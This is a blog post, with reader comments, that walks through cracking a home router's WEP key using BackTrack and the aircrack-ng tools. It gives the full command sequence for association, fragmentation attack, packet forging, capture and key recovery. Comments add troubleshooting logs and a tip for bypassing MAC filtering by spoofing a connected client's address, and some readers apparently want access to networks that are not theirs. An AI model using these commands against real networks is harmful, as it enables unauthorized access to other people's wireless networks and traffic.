In case you weren’t aware, using WEP to secure your home network is a bit like putting a sign on your front door letting everyone know that you do have a key to keep it locked, but if they can work out your clue they’ll be able to find it. And then leaving your key under the mat.
I’ve tried cracking WEP before with limited success - relying on the network to be busy enough to capture packets doesn’t make for reliable cracking, but this method is different - forcing the access point to produce all the packets we need for analysis. I thought it was time I finally proved to myself that it was possible so I dug out the old BT Homehub device and switched on the wireless before booting my MacBook Pro off an excellent pen test Live CD – BackTrack.
All you need is a machine with a wireless card, the BackTrack CD, the MAC address of your target access point, the SSID (the network “name”) and the MAC address of your wireless card.
Once booted, here are the steps I took to obtain the WEP key for the network:
airmon-ng start wifi0 11
wlanconfig ath0 destroy
export AP=00:14:7F:95:5B:AC < -- Access Point MAC
export WIFI=00:14:51:XX:XX:XX < -- WLAN Card MAC
export SSID=BTHomeHub-1100 < -- SSID of target networkifconfig ath1 up
iwconfig ath1 mode Monitor channel 11
aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI ath1
At this point you should see an “Association Successful!” message, you can continue with:
aireplay-ng -5 -b $AP -h $WIFI ath1
You’ll now have to wait until aireplay returns with the packet it has found, when it asks to keep it, say yes. It’ll get saved to a fragment.xor file. You can use the .xor file to forge the packet we’re going to throw at the access point:
packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w arp-request
This will write the forged packet to the file arp-request. Now, time to start capturing the packets we’re going to analyse:
airodump-ng -c 11 -bssid $AP –ivs -w cap ath1
In a new console, start throwing the arp-request packet out to the access point:
aireplay-ng -2 -r arp-request ath1
When it finds our packet, say yes and it will start broadcasting. You should see the airodump stats start to skyrocket at this point. After you’ve got approx 70000 data packets in the airodump window, start another console and run:
aircrack-ng -n 64 -b $AP *.ivs
This will do the work of cracking the key from the captured packets, after a while (less than a minute for me) it will hopefully spit out something like the following:
Job done. Told you WEP was easy.
Hi,
Good to see potentially a simple Macbook Pro solution.
I’ve got so far with it seems to being alright up to the point of when you start in a new console! First of all, how do you do that? (im sure ill see it in the brief instructions on load lol) and also which version of BackTrack are you using? I tried BackTrack1 and it didn’t load correctly, BackTrack2 appeared more hopeful!
Thanks
How long usually does it take for aireplay to return the packet it found? In my case it reads 40000 packets and still didn;t return anything. In tutorials strangely things happen fast (3000 packets or I saw one with even 800).
im need key
@Alex:
Yes, I was using BackTrack2, which is an outstanding bit of kit, recommended for any security consultants/geeks.
@Redrum:
I’ve had results varying from, as you say, 800 packets right up to over 50000. In my experience that has depended on signal strength. I’ve had results in seconds on several networks though.
@BTHomeHub-ABD6:
Your network key will be on the sticker on the back of the HomeHub, or are you attempting to break into your neighbour’s wireless? I was using my own HomeHub for testing, I can’t condone attempting to steal anyone elses service.
hi,
i have laptop and loaded with vista. I connected WIFI internet connection with WEP Secured key. I have connected by using security code and it was working fine.
I was seing porperites of my connection and unfortunately i deleted the security key which i could not save it in my laptop.
Is there any way to get it with out going to see at router location.
Kindly provide the solution which will be very useful to me.
thanking your very much
kal
nice work!
my tencent QQ :510844822
Hello,
I have seen all of the the post about cracking WEP key in 10mins or less. But there are some factors to look at.
1. You should have a very good word list dictionary
2. The AP should be an OPEN…. u should know the rest.
3. PSK AP will be crack if there is a client/ and not locked to accept only listed MAC Addresses….
After saying all this, I guess you are wondering how I came to these conclusion. I have tested it in my house on my router. If you set the router to accept MAC Address listed, aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI ath1 isn’t going to work for you. But there is always a way around a problem. You could wait around till a client join the WLAN and copy his MAC ADDRESS. Now change your MAC address to his. You can then wait till he leaves, and you can start you work.
I am not a master in this, but just a student learn Network Security and trying to make it secure. Any knowledge on protection please share with me.
Hello Howard, thanks for your easy wep steps
I am using BT3 Beta for USB, I’ve tried to hack my own wireless ap, with success(I was using WEP 128). Now, I’m trying to “hack” my brothers wireless ap (he knows about),
but without success! ( he uses open system - wep 64bit and no mac filtering, channel 6 )
I have an atheros 5006 built in my notebook, and I can succesfuly authenticate with his AP.
But when I try to receive data packets to be saved as fragment.xor, … nothing happens,it just continues to read packets, and it never stoped, even after 2 hours!
Here is the screen log:-
=======================================
aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI ath1 (i am always using my actual mac address not fake)
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful
Everything OK, no error message here.
After that:
aireplay-ng -5 -b $AP -h $WIFI ath1
Waiting for a data packet
Read 21,293 packets (and it never stoped, even after 2 hours!)
========================================
I also have tried it on some other ap, to see if it
was my card or config problem, but with other ap, i managed to save fragment.xor in less than 3 minutes!
I am stuck now, Any help would be apreciated
Thank you and have a nice day.
i tried backtrack 2 live CD, problem is i don’t know which wireles card i need (currently using my laptop’s built in card). when i log on it says i can use flux or KDE. i use KDE but the internet tutorials don’t work. there is one for flux. “backtrack> analyzers>kismet” when i do that nothing happens. htired coomand on KDE and flux to run kismet it won’t work.
any ideas? pleaseeeee!!!
sorry about spelling
thanks for the informative how to. After reading the comment that this works on a macbook pro, I decided to try it. I get as far as the first aireplay-ng command and no networks are found. upon destroying ath0, KDE’s internet utilities cannot detect any wireless networks. Is there a different workaround if I putting my Arport Extreme into passive mode doesn’t seem to be working? I know the AE card isn’t supported really in Kismac, but I was led to believe it would work with Backtrack3. Thanks!
I had this working yesterday and then rebooted to test again - now i have the following issue:
aireplay-ng -5 -b $AP -h $WIFI ath1
Saving chosen packet in replay_src-0821-082546.cap
08:25:48 Data packet found!
08:25:48 Sending fragmented packet
08:25:48 Not enough acks, repeating…
08:25:48 Sending fragmented packet
08:25:49 No answer, repeating…
08:25:49 Trying a LLC NULL packet
08:25:49 Sending fragmented packet
08:25:51 No answer, repeating…
08:25:51 Sending fragmented packet
08:25:53 No answer, repeating…
08:25:53 Trying a LLC NULL packet
08:25:53 Sending fragmented packet
08:25:53 Not enough acks, repeating…
08:25:53 Trying a LLC NULL packet
08:25:53 Sending fragmented packet
08:25:54 No answer, repeating…
08:25:54 Sending fragmented packet
08:25:56 No answer, repeating…
08:25:56 Trying a LLC NULL packet
08:25:56 Sending fragmented packet
08:25:58 No answer, repeating…
08:25:58 Sending fragmented packet
08:25:58 Not enough acks, repeating…
08:25:58 Sending fragmented packet
08:25:59 No answer, repeating…
08:25:59 Trying a LLC NULL packet
08:25:59 Sending fragmented packet
08:26:01 Got a deauthentication packet!
08:26:06 No answer, repeating…
08:26:06 Sending fragmented packet
08:26:06 Got a deauthentication packet!
08:26:11 Not enough acks, repeating…
08:26:11 Sending fragmented packet
08:26:12 No answer, repeating…
08:26:12 Trying a LLC NULL packet
08:26:12 Sending fragmented packet
08:26:13 Not enough acks, repeating…
08:26:13 Trying a LLC NULL packet
08:26:13 Sending fragmented packet
08:26:13 Not enough acks, repeating…
08:26:13 Trying a LLC NULL packet
08:26:13 Sending fragmented packet
08:26:14 No answer, repeating…
08:26:14 Sending fragmented packet
08:26:16 No answer, repeating…
08:26:16 Still nothing, trying another packet…
I have tried changing my router to a channel that other routers are not using but this also does not help.
Anyone got any ideas on this?
doa